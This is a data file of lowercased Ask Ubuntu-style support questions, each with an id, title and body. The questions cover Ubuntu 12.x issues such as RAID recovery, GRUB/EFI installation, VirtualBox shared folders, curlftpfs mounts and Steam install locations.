260174	how can i hide mounted volumes when i still want usb volumes to appear on the desktop ?	xubuntu 12.10 xfce 4.10 with thunar 1.6.2 i have two greyed out mounted ( or `` mountable '' ) volumes on my desktop : if i right-click on them , i can mount them , implying they appear not be mounted yet . i do n't understand really why they are greyed out as i can simply double-click them and then browse around . so they are mounted ? but on to my question : neither the icon/volume named datentr채ger 58 gb nor the icon/volume named system-reserviert appear in the fstab file , i checked that via gparted and sudo blkid . here is the output of sudo blkid . the thing is , i 'd still would like to have the option unpluggable devices in the desktop setting ( symbols tab ) activated for usb-related stuff . is that possible ?
260176	/lib/modules/2.6.38-8-generic/build : no such file or directory	i have ubuntu 11.10 installed on my system , upgraded from 11.04 . i need to install the elok touch screen driver . as this driver only supports kernel 2.6 and not 3 , i switched to kernel 2.6 in boot loader . now that i want to make the elok.so module , it gives me an error make make -c /lib/modules/2.6.38-8-generic/build subdirs=/etc/opt/elo-ser/elok_s-source modules make : *** /lib/modules/2.6.38-8-generic/build : no such file or directory . stop . make : *** [ default ] error 2 this error is becuase , when i upgraded from kernel 2.6 to kernel 3.0 , kernel 2.6 was removed from /usr/src and in the /lib/modules/2.6.x.x there is no build directory . i do not know how to solve this problem , please note the details of everything i should do to run my module .
260182	is ubuntu phone for android devices only ?	i have a palm pixi plus and i would be delighted to install ubuntu phone software on my phone . palm pixi plus phone specifications : 600mz processor 256mb ram 8gb storage space
260185	is there way to compile qt5 programs , written with c++ , to ubuntu touch ?	i 'm creating a program with qt5 and c++ , and i would like to compile my program for ubuntu touch preview or ubuntu desktop arm . i 'm running those systems on nexus 7 . i have found the right c++ compiler ( arm-linux-gnueabihf-g++ ) , but how can i get qt5 working ?
260194	`` long '' time booting because `` /tmp is not ready or present ''	i say `` long '' because it 's 30 seconds or a minute . after that time , the computer starts normally , but i do n't know how to improve the boot time . i tried what people say here /tmp is not ready or not present but it does not works , here what i get from the console : gabriel @ gabriel-linux : ~ $ mount -o remount , rw /tmp mount : s贸lo el usuario root puede efectuar esta acci贸n gabriel @ gabriel-linux : ~ $ sudo mount -o remount , rw /tmp [ sudo ] password for gabriel : mount : debe especificar el tipo de sistema de archivos gabriel @ gabriel-linux : ~ $ sudo mount -t ext4 -o remount , rw /tmp mount : /tmp not mounted or bad option gabriel @ gabriel-linux : ~ $ sudo mount -t ext3 -o remount , rw /tmp mount : /tmp not mounted or bad option gabriel @ gabriel-linux : ~ $ sudo mount -o remount , rw /tmp mount : debe especificar el tipo de sistema de archivos gabriel @ gabriel-linux : ~ $ ^c gabriel @ gabriel-linux : ~ $ my system works , but i get that screen while booting and it needs a lot of time to start . it 's mounted , anyway , when i do cd /tmp/ and later ls , this is what i get : gabriel @ gabriel-linux : ~ $ cd /tmp/ gabriel @ gabriel-linux : /tmp $ ls keyring-egghw2 pulse-rz9fuvkmqvkq tmpksefuk pulse-pkdhtxmmr18n ssh-uzyitpfn1698 unity_support_test.0 gabriel @ gabriel-linux : /tmp $ the problem :
260198	text messaging and calls do n't work on ubuntu touch dev preview	i just got ubuntu touch on my galaxy nexus . i 'm really thrilled about its design concepts and its beautiful ui . however , text messages and calls do n't work . is n't this supposed to work already ? could this be because i 'm in germany ? maybe this is just a small problem which i can fix myself , does anyone know ?
260201	how can host access the files on guest on vm ?	how can i set up vm so that the host can access the files on the guest as if the files on guest are on the hard-drive of host ?
260204	changing default owner of vbox shared folders	first i am quite new to ubuntu and trying to commit myself to it as a php developer . well , i am running on a guest xubuntu 12.10 system based on windows7 host . i shared my web_projects folder and managed to access it by adding my ubuntu user to vboxsf group . i symlink a folder inside web_projects as virtual host but it simply says access denied because owner of shared folder is root . what i need to do is changing default owner of vbox shared folder so i can reach them through apache . thanks for any light . i made some digging [ 1 ] that ends up with : yahya @ ubuntu : ~ $ sudo mount -t sf_web_projects -o uid=1000 , gid=1000 share /home/yahya/mirror mount : unknown filesystem type 'sf_web_projects' error mounting virtualbox shared folders in an ubuntu guest
260205	how do i prepare my music for syncing with a cloud service ?	my music collection has grown to now approx . 4000 files over the years . they mostly consist of mp3 downloaded from different online shops at various bitrates , mp3 ripped from cds i own , and drm-free m4a files from itunes . in case this matters , i made quite some effort to have my files orderly saved with the following pattern : /shared/music/artist/album/track # title.mp3 now i plan to upload these to a cloud music service ( i was thinking of google play ) . i understand that these services are capable of not actually uploading the music data from my files but rather just provide a link to songs they already have on their servers . this is fine as because of limited bandwith , and because of a possible violation of copyright laws in my country i do not want my music files to be uploaded anywhere . also i do not want my files to end up like this : /artist/album/track # title1.mp3 /artist/collection/sometrack # title2.mp3 /artist/best_of/yetanothertrack # title3.mp3 /artist/bonusalbum_from_japan_only/specialtrack # title4.mp3 how would i have to prepare my music collection to be properly recognized by the service ? what applications are available to aid me in doing so ?
260206	how to uninstall a program ( magicdraw ) and clean hidden files	i installed magicdraw 17.0 se in /opt running the sh i downloaded from the official site . i had to re-install it because of a java issue , so i deleted the opt/magicdraw folder and i ran the sh again . the problem is that i have a hidden .magicdraw folder which has not been updated after the new installation , and i need it to be updated , since i messed with the files that were inside it and it 's completely useless now . so , how can i uninstall magicdraw properly ?
260208	error : glsl 1.50 is not supported : intel速 965gm x86/mmx/sse2 ubuntu 12.04	i get the error which is showing down when i try to run the opengl programme . i use 12.04 and my graphics is intel速 965gm x86/mmx/sse2 vendor : tungsten graphics , inc renderer : mesa dri intel ( r ) 965gm x86/mmx/sse2 version : 2.1 mesa 8.0.4 glsl : 1.20 [ from lab1-1.vert : ] 0:1 ( 10 ) : error : glsl 1.50 is not supported.supported versions are : 1.00 es , 1.10 , and 1.20 [ from lab1-1.frag : ] 0:1 ( 10 ) : error : glsl 1.50 is not supported.supported versions are : 1.00 es , 1.10 , and 1.20 [ from lab1-1.vert+lab1-1.frag : ] error : linking with uncompiled shadererror : linking with uncompiled shader gl error 0x502 detected in init shader gl error 0x502 detected in init arrays my .vert and .frag has a # version 1.50 but even if i change them into # 1.20 it is not working does any one know how to fix the problem ?
260209	networking disabled under vmware fusion on mac os x	i use macbook with mac os x lion 10.7.5 . i have installed vmware fusion 5.0.2 , under which windows 7 and ubuntu 12.04 lts have been installed as virtual machines . under ubuntu vmware-tools-distrib 9.0.1 ( 01 nov 2012 ) has been installed . everything worked well including network : once mac is connected to internet , windows and ubuntu are connected . however , for 2 days ubuntu can not be connected to interent anymore . when i log in , it shows `` network disconnected - you are now offline '' . network under windows still works well . i tried to restart , reinstall wmware tools , it did n't help . could anyone help ? ps : the problem has been solved : we re-edited interfaces , and restarted networking .
260210	ubuntu 12.10 install does n't detect windows 7 for dual boot `` no operating system found '' on primary partition	installed windows 7 on a newly assembled pc ( yesterday ) . runs fine . trying to install ubuntu 12.10 64bit from dvd but installer does not give me an option to install `` alongside '' windows 7 . i only get the wipe everything or go fiddle with the partition options . `` no operating system found '' intel mobo dh77df with an msata ssd of 256gb , primary partition with windows 7 is some 60gb , with the rest unallocated . installer running off a usb dvd drive . looking at the drive from the installer 's partition mapper the windows partitions can be seen , but no operating system is found . how do i get around this ? i 've installed various linux distros over the years and never seen this before .
260213	how can i update homebank from 4.4 to 4.5 ?	how can i update homebank from 4.4 to 4.5 . i followed the install notice on the site but it does not work . is there a ppa ?
260216	why does ubuntu java server disconnect clients ?	i am using ubuntu linux 12.04.1 lts edition . i hosted a java server and it worked fine till yesterday , when a sudden disconnection of 500 clients occured . i got an error java.io.ioexception : connection reset by peer after connecting to the server . why am i getting this error ? is there any ip filter is activated in ubuntu after the sudden disconnection ?
260217	broken raid 1 array - i think i messed up	i have a big problem with my raid setup . so if anyone is interested , please help ... i have a raid1 setup with 2 hdd . one day i saw in the smart data of one on the disks that it had some bad sectors , so i thought i must replace that disk before it is too late . following are the trial and error steps that i took and messed up the situation ... while the pc was off , i diconected the hdd with the bad sectors and place in the same port a new disk ( same model and brand ) . i entered the matrix raid system and as i remember it said something like `` one of you disks needs to be rebuilt , do you want to do this ? '' and of course i presses yes . i tried to boot into ubuntu , but the drive was not mounted . so i thought i must sync the disks . i tried to mdadm -- assemble -- force , but the disks were in use by dmraid ( which i didnt know that existed ) , so no results . i also tried different mdadm commands ( -- scan , -- create , -- examine ) , but i think nothing happened as the disks were busy by the dmraid . after , i plug all 3 disks and reboot . probably bad idea . root @ archive : ~ # dmraid -r /dev/sdd : isw , `` isw_eacbgfdicf '' , group , ok , 2930277166 sectors , data @ 0 ( new empty disk ) /dev/sdc : isw , `` isw_eacbgfdicf '' , group , ok , 2930277166 sectors , data @ 0 ( old disk without bad sectors ) /dev/sdb : isw , `` isw_dbaiefcihd '' , group , ok , 2930277166 sectors , data @ 0 ( old disk with bad sectors ) root @ archive : ~ # dmraid -ay error : isw : wrong number of devices in raid set `` isw_dbaiefcihd_volume0 '' [ 1/2 ] on /dev/sdb error : creating degraded mirror mapping for `` isw_dbaiefcihd_volume0 '' raid set `` isw_dbaiefcihd_volume0 '' was not activated raid set `` isw_eacbgfdicf_volume0 '' already active root @ archive : ~ # dmraid -s error : isw : wrong number of devices in raid set `` isw_dbaiefcihd_volume0 '' [ 1/2 ] on /dev/sdb *** group superset isw_dbaiefcihd -- > *inconsistent* subset name : isw_dbaiefcihd_volume0 size : 2930272512 stride : 128 type : mirror status : inconsistent subsets : 0 devs : 1 spares : 0 *** group superset isw_eacbgfdicf -- > active subset name : isw_eacbgfdicf_volume0 size : 2930272512 stride : 128 type : mirror status : nosync subsets : 0 devs : 2 spares : 0 i reboot with only the 2 old disks pluged . root @ archive : ~ # dmraid -r /dev/sdc : isw , `` isw_eacbgfdicf '' , group , ok , 2930277166 sectors , data @ 0 ( old disk without bad sectors ) /dev/sdb : isw , `` isw_dbaiefcihd '' , group , ok , 2930277166 sectors , data @ 0 ( old disk with bad sectors ) root @ archive : ~ # dmraid -s error : isw : wrong number of devices in raid set `` isw_dbaiefcihd_volume0 '' [ 1/2 ] on /dev/sdb error : isw : wrong number of devices in raid set `` isw_eacbgfdicf_volume0 '' [ 1/2 ] on /dev/sdc *** group superset isw_dbaiefcihd -- > *inconsistent* subset name : isw_dbaiefcihd_volume0 size : 2930272512 stride : 128 type : mirror status : inconsistent subsets : 0 devs : 1 spares : 0 *** group superset isw_eacbgfdicf -- > *inconsistent* subset name : isw_eacbgfdicf_volume0 size : 2930272512 stride : 128 type : mirror status : inconsistent subsets : 0 devs : 1 spares : 0 root @ archive : ~ # sfdisk -d /dev/sdc | sfdisk /dev/sdb checking that no-one is using this disk right now ... ok disk /dev/sdb : 182401 cylinders , 255 heads , 63 sectors/track sfdisk : error : sector 0 does not have an msdos signature /dev/sdb : unrecognized partition table type old situation : no partitions found sfdisk : error : sector 0 does not have an msdos signature /dev/sdc : unrecognized partition table type no partitions found new situation : no partitions found sfdisk : no partition table present . root @ archive : ~ # dmraid -re do you really want to erase `` isw '' ondisk metadata on /dev/sdc ? [ y/n ] : n do you really want to erase `` isw '' ondisk metadata on /dev/sdb ? [ y/n ] : y root @ archive : ~ # dmraid -r isw_eacbgfdicf /dev/sdb error : isw : wrong number of devices in raid set `` isw_eacbgfdicf_volume0 '' [ 1/2 ] on /dev/sdc isw : drive to rebuild : /dev/sdb raid set `` isw_eacbgfdicf_volume0 '' was activated sgpio app not found sgpio app not found root @ archive : ~ # dmraid -r /dev/sdc : isw , `` isw_eacbgfdicf '' , group , ok , 2930277166 sectors , data @ 0 /dev/sdb : isw , `` isw_eacbgfdicf '' , group , ok , 2930277166 sectors , data @ 0 root @ archive : ~ # dmraid -s *** group superset isw_eacbgfdicf -- > active subset name : isw_eacbgfdicf_volume0 size : 2930272512 stride : 128 type : mirror status : ok subsets : 0 devs : 2 spares : 0 root @ archive : ~ # dmsetup status isw_eacbgfdicf_volume0 : 0 2930272520 mirror 2 8:16 8:32 22357/22357 1 aa 1 core root @ archive : ~ # sudo mount -a mount : wrong fs type , bad option , bad superblock on /dev/mapper/isw_eacbgfdicf_volume0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so root @ archive : ~ # dmraid -ay raid set `` isw_eacbgfdicf_volume0 '' already active and at this point i think that the old disk without bad sectors synced from the blank new disk and i lost everything , but i am not sure . any help is very appreciated ... thanks in advance !
260220	not able to connect airtel 3g dongle however tata photon woked properly and airtel is identified by tata photon pop up window	i am using ubuntu 10.10 and have been using tata photon dongle on it successfully . i recently wanted to switch to the airtel 3g dongle due to nice speed it offers but have not been able to it since many days . i am able to run this airtel 3g dongle on windows and tried following thongs on ubuntu . a ) i tried installing it by running sh ./install_linux in /media/airtel/ i do n't know how to check if it has been correctly installed . b ) then i was waiting for a pop up window to appear as happened in the case of tata photon but nothing happened . i had been trying many things manually . i had also tried setting a mobile broadband connection manually but nothing happens . also the tata-photon window pops up when i connect airtel dongle into usb and shows airtel signal it is connecting to . please help me .
260222	is there a file manager which you can sort files manually with , as in windows ? or , can i manually sort my files from the terminal ?	in nautilus you can sort files manually only in the icon view ( and the arrangement is a mess ) . my question is : is there a file manager which you can sort files manually with , as in windows ? i.e. , manually to arrange in list view , or manually to arrange in icon view without disturbing the lines . ( ps : maybe i did n't explain myself properly , in windows i can drag a file and put it in the position that i want in the folder , in any type of view , however in nautilus i can do it only in the icon view , and this just disturbing the lines of files . i tested dolphin , konqueror , pcmanfm , thunar , rox-filer , xfe and gnome-commander , and they do n't even have this option in icon view . and snow , thank you for your contribution but that link do n't fix my problem , at the bottom there is something that seems connected but i 'm a beginner and i do n't understand , is this : ) pos is f [ .c ] [ opts ] , where f is the field number and c the character position in the field . opts is one or more single-letter ordering options , which override global ordering options for that key . if no key is given , use the entire line as the key . ) if not , can i manually sort my files from the terminal ? thanks in advance , and sorry for my english .
260223	n56vz : subwoofer not working anymore	i use ubuntu 12.04 on asus n56vz , the subwoofer used to work doing the following trick advised by sami : a . add to rc.local echo 0x1e 0x99130112 > /sys/class/sound/hwc0d0/user_pin_configs echo 1 > /sys/class/sound/hwc0d0/reconfig b . add options snd-hda-intel model=asus-mode4 in /etc/modprobe.d/alsa-base.conf c. reboot d. set the mode to `` analog surround 5.1 output '' in the sound settings panel but a few weeks ago , the `` analog surround 5.1 output '' box does not appear anymore on the sound setting panel i tride to install this driver : https : //wiki.ubuntu.com/audio/upgradingalsa/dkms but no result . here is my /etc/rc.local : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . fstrim -v / fstrim -v /home echo 0x1e 0x99130112 > /sys/class/sound/hwc0d0/user_pin_configs echo 1 > /sys/class/sound/hwc0d0/reconfig exit 0 and my /etc/modprobe.d/alsa-base.conf : # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 options snd-hda-intel model=asus-mode4 '' thanks a lot for your help .
260226	how to fix shutter ?	error message : warning : net : :dbus : :glib is missing -- > ubuntu one support will be disabled ! warning : image : :exiftool is missing -- > writing exif information will be disabled ! ca n't locate pod/usage.pm in @ inc ( @ inc contains : /usr/share/shutter/resources/modules /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . ) at /usr/share/shutter/resources/modules/shutter/app/options.pm line 36 . begin failed -- compilation aborted at /usr/share/shutter/resources/modules/shutter/app/options.pm line 36 . compilation failed in require at /usr/bin/shutter line 151 . how to fix it ?
260234	ubuntu12.04 boots to black screen on old desktop	i try to install ubuntu 12.04.1 on an old desktop computer . it took a long time to install but it completed installation and it messaged to restart for boot . ( the installation was in the graphical mode ) . -installed with install parameters after unsuccessfull trials with no parameters trials : noapic nolapic all_generic_ide nomodeset ( of inclusion of last one i am not sure ) every time i start the computer it showed the ubuntu loading image but in a crippled way . it was very small and just at the some rectangular fraction of the screen and rest screen was black . this happens in a very short time then it goes black screen and nothing happens . what is the reason of that or what can be ? what is the solution for that ? screens of computer at start : incase of photos wont show here i write some of data written there includes some i found related to video : -intel ( r ) celeron ( r ) processor , 2.66ghz , 256mb ram . -display type vga/ega -onboard display controller . irq11 -onboard vga irq11 -amibios date 2004 -acpi compliant bios additionally there are some suggestions to install appropriate video drivers ( or boot ceratain parameters like nomodeset first and once started ubuntu desktop install appropriate drivers ) , but i can not reach ubuntu desktop it does not boot , so are there ano覺ther way to install drivers required by ubuntu to boot without boot it , like some boot cd to only install drivers .
260239	i can not make a installation usb	for some reason i can not make a installation usb from my system already working , i have tried two different usb 's formatted them , but still the `` make startup disk '' is still faded out ! ! whiuch i do n't understand at all , what could be wrong , please do n't make the answer too complicated , as i am not at all into computers and programming , is there a really easy way to solve the problem ? thanks you !
260240	xubuntu lightdm unity-greeter bad looking theme	i 'm using xubuntu 12.10 and wanted to use the unity-greeter for the login screen ( lightdm ) . the thing is that i installed the package unity-greeter ( and gnome-settings-daemon ) , changed to unity-greeter in the lightdm.conf file but the login screen turned out something like this http : //i.imgur.com/lssnng3.png and this http : //i.imgur.com/qtdu0xo.png ( please ignore the vertical panel , i used the -- test-mode to take the screenshots ) . as you can see the theme does n't look as it should , there are those `` old '' icons used and when i click to select the environment it can be seen that the windows look like beeing an old debian theme . what can i do to make it look `` normal '' ?
260244	make nemo the default file browser	i installed ubuntu 12.10 , then installed nemo . now i would make nemo the default file manager . i 've search the web for a solution but everytime i restart my computer nautilus come back . does anyone know an effective solution ?
260246	ubuntu 12.10 on intel atom tablet	i have an intel atom n2600 tablet which was running windows 8 , but got excited about ubuntu and decided to install ubuntu 12.10 on it . it detected all necessary hardware ( camera , wifi , bluetooth etc ) and touch worked the moment it booted to gui screen . i have external cdrom and keyboard only , no mouse since the touch is working perfectly well . but , after installation , it ejects the cd , and then it stalls . after manual rebooting , it will stop at the black and white screen with the ok things . any help to make it work ?
260248	ubuntu software center 's history is showing software which i have not installed	i am running linux for the first time and have installed ubuntu 12.10 , 64-bit os on my laptop , alongside windows 7 . my question may be a stupid one since i am yet to begin discovering all of ubuntu 's features . the software center 's history section on my ubuntu is showing a large list of files ( software ) , installed on 17 october 2012 , at 09:28 am . i have never really installed any software from that list . i would like to know what exactly is that large list of files ? sorry if this is a naive question ... here 's a link to the screenshot : screenshot of my software center 's history section
260250	how to find and download a missing plugin ?	i tried to add a radio station to the radio player of rhythmbox , so i clicked `` add '' and copied the url but it wo n't play when i click on `` play '' . a window comes in the first place searching for a plug-in then it tells me ( something like ) that : python 2.7 is missing a plug-in type text html decoder when i open the properties of the radio added it tells : your gstreamer installation is missing a plug-in . how can i fix this ?
260252	irregular key mapping ?	any better title is welcome . all of a sudden when i press : d - i either see d typed in or i get a print screen window e - i either see e typed or i see volume bar rise c - i either see c typed or i have many different effects ( depends on context ) so far i 'm unable to tell what is the `` trigger '' or `` toggle '' for this peculiarity . i 'm frankly at a loss what to investigate . few findings : - while this first manifested in a browser ( ff + vimperator ) this is not browser limited - gvim , terminal even tty ( i switched to it ) can have that - in tty d becomes \ ; and c becomes ^ [ [ 5~b and presses enter . - in kern.log i see no entries when tailing when i press d even when i see volume bar increasing upon keypress - i see no strange shortcuts when i open keyboard shortcuts window any clues ? i had not run any updates recently , nor have i installed something . this interrupts my work to the point i had to borrow someone else 's laptop to type this . update visa1 : 3 - deletes first character in line and puts cursor there # - inserts last cut or highlighted ( i 'm unsure here ) thing these have been tested only in terminal and tty and login shell . another keyboard - currently none at hand that i can plug in . @ mordoc fn key inputs : i do n't think it 's jammed key . fn key works as expected except for volume . pressing fn+e does n't give me e , though i had few times earlier , before posting this question where i had `` toggled '' this with function key . this however is not consistent . normal volume keys were on f2 and f3 and they do not work now . mute key works as usual . so , it rather is n't the case for jammed key but it still found us something new . 2nd update problem `` solved '' itself equally suddenly as it had manifested . ** leaving this open for a week or so . vasa1 - your comments were closest to the cause i think , so feel free to post them as an answer , along with `` another keyboard '' suggestion . 3rd update - root cause identified , problem solved after a year the problem reappeared and what i noticed further is : it appeared more often when laptop was in unbalanced position it often disappeared when i pressed region next to touchpad took the laptop to the service and voila - keyboard was faulty . on new keyboard problem does not occur . vasa1 , right on the money .
260253	flareget browser integration	i want to integrate flareget to google chrome . flareget says i need to download browser integration plugin from the website . when i click on it , i see the following : forbidden you do n't have permission to access /index.php on this server . additionally , a 403 forbidden error was encountered while trying to use an errordocument to handle the request . so how to i integrate flareget to my chrome browser now ?
260258	search in a big file for specific string	i have a 6 gb text file . it has an access record for a whole month to my website . that file is my only hope to know how a someone got access to my website and hacked it . but , as the file is too big , gedit does n't open it . is there any command or method i could use to read or search in the content of that file ? i tried the following command grep -i '18/jan ' 02records but it takes a while and then no results show . i want lines that have '18/jan ' . thanks
260259	where can i get drivers for a toshiba laptop ?	how do i update my drivers for a toshiba satellite m65-s809 ?
260262	can i use the samsung official sources to build ubuntu touch on samsung galaxy sii i9100 ?	i would like to know if i can use official android jelly bean sources from samsung , for the gs2 i9100 , from samsung open source release center , to build a port of ubuntu touch , despite the cyanogenmod 10.1 sources , in the official porting guide .
260271	where is stardict-repair option ?	i have a dictionary in stardict format without an *.ifo file . i know how the file should look like , but i do n't know how many words exactly the dictionary has , neither how to check it without counting manually [ sic ] . i 've spent a couple of hours looking for the answer but found none . i have installed stardict-tools from the software center , but apparently it is n't equipped with the option `` stardict-repair '' , mentioned here : http : //code.google.com/p/stardict-3/wiki/repairstardictdicts , on the stardict project 's page . so my question is twofold : 1. how to obtain stardict-repair on ubuntu 12.10 and get it running ; 2 . ( perhaps a bit off-topic ) how to conveniently create a correct ifo file if there is n't any .
260273	how can i remotely stream videos to my tablet ?	i 'd like to be able to watch my videos that i keep on my desktop running ubuntu 12.04.2 on my tablet ( nexus 7 ) when they 're connected to different networks . for example , when i 'm at my girlfriend 's house , and i 've left my computer running at home . can anybody either walk me through how to set this up , or recommend an app that will do this for me ? i 'd prefer a free option if possible ! i tried plex media server , but i ca n't access the in-browser manager any more for some reason ...
260276	ubuntu 12.10 macbook pro install problems	i have a macbook pro ( probably the newest one , but not the retina one ) here . i want to dual-boot ubuntu 12.10 on it , but i 've been have many troubles . youtube has offered me no help ; same with google . if i make a dvd or cd ( the cd would have to be of ubuntu 12.04 due to file size ) , it boots from it , but wo n't even get to the purple screen . it just stays on the first black screen with a white blinking cursor . nothing changes . i ca n't make a bootable usb stick for mac , though . i do have another computer with ubuntu on it , but ever since it started to crash when i make a bootable usb , i started downloading more programs , which caused it to just say 'installation failed ' immediately . i tried unetbootin , but that does n't work with macs . i tried the terminal method , but that makes the usb stick unrecognizable by the computer , making it useless . i think this is my best bet , but it 's not working anymore . once i do get ubuntu booted up , installed , ready to go , the wireless capabilities are completely disabled . i checked under networkmanager , but it just says wired connections , enable networking , edit connections . no wireless thingy at all . i tried installing b43 but i do n't know how to activate it . i eventually just delete it and try again . it happens every time . reinstalling ubuntu did n't help either . thanks in advance .
260277	live usb wo n't boot	i created a live usb using the live usb creator so that i could install kubuntu . however , when i attempt to boot into it , i get a message that says : '' secure boot not enabled '' how can i enable secure boot , or is there another workaround ? i have a macbook pro from early 2008 .
260280	comparing disk/partition/os cloning tools	it seems the tools used by most people for cloning and then restoring their system , disk or partition ( either for copying their system to another machine or creating backups ) are : clonezilla ( https : //sourceforge.net/projects/clonezilla or https : //sourceforge.net/projects/partedmagic ) redo ( https : //sourceforge.net/projects/redobackup ) remastersys ( www.remastersys.com ) note : i 'm not talking about different backup methodologies/tools here . can people who have fully tested all these 3 tools sum up how they compare in terms of : reliability ( which is the most important of course ) speed user-friendliness
260284	grub boot problem on dual boot machine	i have three systems on my computer . i have had windows for ages , than i installed linux mint and recently ubuntu . bootloader is using mints grub . how do i change it so it will be using grub from my ubuntu partion ? i want to get rid of mint , but i 'm afraid that if i just delete/format mint partition , i will screw up my grub and wo n't be able to boot into any of my systems . windows ( sda3 ) mint ( sdb1 ) ubuntu ( sda5 )
260288	how can i change where steam installs games ?	i have a lenovo u410 laptop . my recent install broke so i reinstalled with 13.04 daily . it 's on a 30gb primary sdd , and i want to offload large files to the 1tb hard drive that also resides in my system . i installed steam and it defaulted to my ssd as expected . is there anything special i would have to add to the fstab for my second ext3 hdd ? is this as simple as symlinking to a directory on the hard disk ? conclusion : i mounted my hard drive disk as /home in the fstab . since it 's now ext4 steam installs games and dependencies there by default .
260292	difficulties updating launchpad / software updater errors	i reference a text file thru out this question . it can be found here . fairly new user , forgive me if this has already been answered . i 've done some searching first , but nothing quite matches up . the question boils down into three parts . i 'm running 12.10 , and recently software updater yelled at me stating it had 26 updates to install . i was updating another program so i chose `` remind me later '' ( or whatever the equivalent was ) , and then when i went to update a few minutes later , i get the following error ( check text file i 've linked at the start ) : i did some searching here and the closest i found was this answer ( check file i 've linked at the start ) . i 've used the scripted removal advised by fossfreedom but i 'm still getting errors when software updater tries to run . i 'm only concerned because based on my homework it seems that launchpad is somewhat important , so i 'm concerned unchecking it in software sources will keep me from getting future updates on it . so , the two parts are if i uncheck them in software sources , will that be preventing all possible launchpad updates , will some other `` failsafe '' still update launchpad with those items unchecked , or is there something else i should be doing ? thanks in advance for any guidance you can provide . ps : i apologize that i had to link to a text file with info on the errors and a link to the question i had checked , but i do n't have enough rep to have 2 or more urls , and the errors contain urls . if there was something i could have done ( like linking a question without triggering this , please trout me for it ) .
260296	curlftpfs mount disagrees with the fstab	i am working with curlftpfs to mount a remote ftp directory locally in kubuntu 12.04 64-bit . i have the following entry in my /etc/fstab : curlftpfs # ftp_user : ftp_password @ ftp_server /mnt/nimh fuse ro , noexec , nosuid , nodev , noauto , user , allow_other , uid=1000 , gid=1000 0 0 i have created the directory in /mnt with the following : |- > ll /mnt total 4.0k drwxrwxr-x 2 jim fuse 4.0k jan 6 09:56 nimh/ my user does belong to the fuse group as well : uid=1000 ( jim ) gid=1000 ( jim ) groups=1000 ( jim ) ,27 ( sudo ) ,105 ( fuse ) i am able to mount manually without issue but then the /mnt changes to : |- > mount /mnt/nimh |- > ll /mnt total 0 drwxr-xr-x 1 jim jim 1.0k dec 31 1969 nimh/ however when i attempt to umount /mnt/nimh i receive : umount : /mnt/nimh mount disagrees with the fstab my /etc/mtab looks like : curlftpfs # ftp : //ftp_user : ftp_password @ ftp_server/ /mnt/nimh fuse ro , noexec , nosuid , nodev , allow_other , user=jim 0 0 i am able to umount the filesystem without issue if i sudo . any idea what i 'm missing in order to be able to unmount without having to use sudo ?
260297	12.04.2 failed to install grub-efi to /target/	i have a lenovo u410 ultrabook . it 's sata scheme consists of a 30gb ssd and a 1tb hdd in a raid0 with intel rapid start technology . i removed irst and disabled the raid0 . i want to install ubuntu on the ssd and /home on the 1gb hdd . i foolishly erased the efi partition on the 1tb and attempted to recreate it by formatting the ssd and creating a new gpt partition table . i made a 250mb fat32 partition ( /dev/sda1 ) and filled the rest ~24gb with an ext4 partition ( /dev/sda2 ) i made a live usb using a 12.04.2 iso and universal usb installer . the installation completes fine however at the end i get an error `` failed to install grub-efi to /target/ the system will not boot '' i tried to open terminal and update grub however it 's not there and when trying to install grub-efi from the repo i get flagged for missing a lot of dependencies . ubiquity crashes after the error message . i had success a few months ago installed 12.10 using my friends usb cd drive however i broke the system and cant be down until i next see him . is there a huge difference in 12.10 and lts that would stop this install from working smoothly ? my net goal is to have ubuntu running on the machine with steam ( tf2 and bastion ) and eclipse ide . if 12.10 is better suited , and can solve this efi issue then i 'll gladly install that however from my understanding lts would be more stable and still run the modern updates of quantal . tl ; dr will 12.10 install grub-efi flawlessly ? and if not how can i install grub-efi from the live usb onto a solid state drive /dev/sda with efi boot on /dev/sda1 , ext4 mounted as root on /dev/sda2 , and /home on the hard disk /dev/sdb2 ? conclusion : lts was n't capable of handling the uefi environment . downloading and installing 12.10 worked flawlessly . raring worked fine too , however it was unstable with the drivers necessary for steam .
